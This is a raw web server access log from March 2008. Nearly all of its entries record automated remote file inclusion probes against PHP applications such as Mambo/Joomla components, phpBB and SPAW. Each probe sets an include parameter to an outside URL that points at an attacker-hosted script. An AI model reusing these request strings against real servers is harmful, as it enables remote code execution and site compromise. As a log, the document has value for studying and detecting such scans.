87.230.79.168 - - [04/Mar/2008:06:26:45 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:26:45 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:26:46 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:26:46 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:26:46 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:26:46 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:27:07 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:27:07 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:27:14 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:06:27:24 -0800] "GET /logs/access.log/index3.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:06:27:24 -0800] "GET /index3.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:06:27:25 -0800] "GET /logs/index3.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.6.4 - - [04/Mar/2008:06:27:41 -0800] "GET /logs/access_080119.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.6.4 - - [04/Mar/2008:06:27:42 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.6.4 - - [04/Mar/2008:06:27:42 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:27:53 -0800] "GET /logs/access_080207.log//class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:06:28:05 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.grupslactancia.info/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.70.58 - - [04/Mar/2008:06:28:11 -0800] "GET /logs/access_080207.log//templates/mangobery/footer.sample.php?Site_Path=http://sierra-hulinggi.com/alat/idscan2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.28.131 - - [04/Mar/2008:06:28:13 -0800] "GET / HTTP/1.1" 200 3094 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "www.dmulk.com"
209.62.126.66 - - [04/Mar/2008:06:28:50 -0800] "GET /logs/access_080119.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ar-vision.com/z.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.126.66 - - [04/Mar/2008:06:28:50 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.ar-vision.com/z.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.126.66 - - [04/Mar/2008:06:28:50 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ar-vision.com/z.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:06:29:12 -0800] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:06:29:13 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:06:29:13 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:29:31 -0800] "GET //include.php?path[docroot]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:29:31 -0800] "GET /logs//include.php?path[docroot]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:29:32 -0800] "GET //include.php?path[docroot]=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:29:33 -0800] "GET /logs//include.php?path[docroot]=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:29:34 -0800] "GET //include.php?path[docroot]=http://surgut-spid.ru/language/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:29:34 -0800] "GET /logs//include.php?path[docroot]=http://surgut-spid.ru/language/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.62.126.66 - - [04/Mar/2008:06:29:36 -0800] "GET /logs/access_080122.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ar-vision.com/z.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:06:29:39 -0800] "GET /logs/access_080119.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:06:29:40 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:06:29:40 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.126.6.4 - - [04/Mar/2008:06:30:37 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.45.190.173 - - [04/Mar/2008:06:31:00 -0800] "GET /logs/access_080207.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [04/Mar/2008:06:31:01 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [04/Mar/2008:06:31:02 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:31:33 -0800] "GET //include.php?path%5Bdocroot%5D=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:31:33 -0800] "GET /logs//include.php?path%5Bdocroot%5D=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:31:34 -0800] "GET //include.php?path%5Bdocroot%5D=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:31:34 -0800] "GET /logs//include.php?path%5Bdocroot%5D=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:31:36 -0800] "GET //include.php?path%5Bdocroot%5D=http://surgut-spid.ru/language/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:31:36 -0800] "GET /logs//include.php?path%5Bdocroot%5D=http://surgut-spid.ru/language/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:31:42 -0800] "GET /logs//include.php?path[docroot]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:31:42 -0800] "GET //include.php?path[docroot]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:31:43 -0800] "GET /logs//include.php?path[docroot]=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:31:43 -0800] "GET //include.php?path[docroot]=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:31:44 -0800] "GET //include.php?path[docroot]=http://surgut-spid.ru/language/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:31:47 -0800] "GET /logs//include.php?path[docroot]=http://surgut-spid.ru/language/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:06:32:03 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:06:32:03 -0800] "GET /index.php?pageurl=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:06:32:03 -0800] "GET /logs/index.php?pageurl=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:06:32:05 -0800] "GET /logs/access_080105.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.pcr.ac.id/~rina/includes/db/new.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.252.251 - - [04/Mar/2008:06:32:48 -0800] "GET /logs/access_080131.log/?path[docroot]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.212.247.135 - - [04/Mar/2008:06:32:48 -0800] "GET /logs/access.log/?path[docroot]=http://acs-fungamer.de/images/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [04/Mar/2008:06:32:48 -0800] "GET /?path[docroot]=http://acs-fungamer.de/images/can? HTTP/1.1" 200 3094 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [04/Mar/2008:06:32:49 -0800] "GET /logs/?path[docroot]=http://acs-fungamer.de/images/can? HTTP/1.1" 200 37260 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:32:52 -0800] "GET /logs/access_080111.log//ws/login.php?includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:32:52 -0800] "GET //ws/login.php?includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.45.190.173 - - [04/Mar/2008:06:33:20 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:06:33:39 -0800] "GET /errors.php?error=http://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:06:33:40 -0800] "GET /logs/errors.php?error=http://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:06:34:02 -0800] "GET /logs/access_080216.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:06:34:08 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:06:34:09 -0800] "GET /logs/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.193.190 - - [04/Mar/2008:06:34:34 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.193.190 - - [04/Mar/2008:06:34:39 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.193.190 - - [04/Mar/2008:06:34:44 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:06:34:50 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:06:34:55 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:06:34:59 -0800] "GET /logs/access_080208.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:06:35:00 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:06:35:00 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:35:03 -0800] "GET /logs/index.php?body=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:35:03 -0800] "GET /index.php?body=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:35:04 -0800] "GET /index.php?body=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:35:06 -0800] "GET /index.php?body=http://surgut-spid.ru/language/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
200.58.182.146 - - [04/Mar/2008:06:35:06 -0800] "GET /logs/index.php?body=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
67.18.66.202 - - [04/Mar/2008:06:35:21 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:06:35:48 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:06:35:48 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:06:35:57 -0800] "GET /logs/access_080221.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.186 - - [04/Mar/2008:06:36:22 -0800] "GET /logs/access.log HTTP/1.0" 200 194796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:36:32 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:36:33 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.17.26.135 - - [04/Mar/2008:06:36:38 -0800] "GET /logs/access_080119.log//?pag=http://biglion.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:36:39 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:36:48 -0800] "GET /index.php?body=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:36:48 -0800] "GET /logs/index.php?body=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:06:36:50 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:36:50 -0800] "GET /index.php?body=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:06:36:50 -0800] "GET /errors.php?error=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:36:50 -0800] "GET /logs/index.php?body=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:06:36:51 -0800] "GET /logs/errors.php?error=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:36:54 -0800] "GET /index.php?body=http://surgut-spid.ru/language/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
68.161.236.45 - - [04/Mar/2008:06:36:54 -0800] "GET /logs/index.php?body=http://surgut-spid.ru/language/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:06:36:58 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:06:37:02 -0800] "GET /logs//include.php?path[docroot]=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.162.147.212 - - [04/Mar/2008:06:37:10 -0800] "GET /logs/access_080105.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:06:37:23 -0800] "GET /logs/access_071224.log/index.php?pageurl=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:37:26 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:37:27 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:37:28 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:06:37:37 -0800] "GET /logs//index.php?command=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
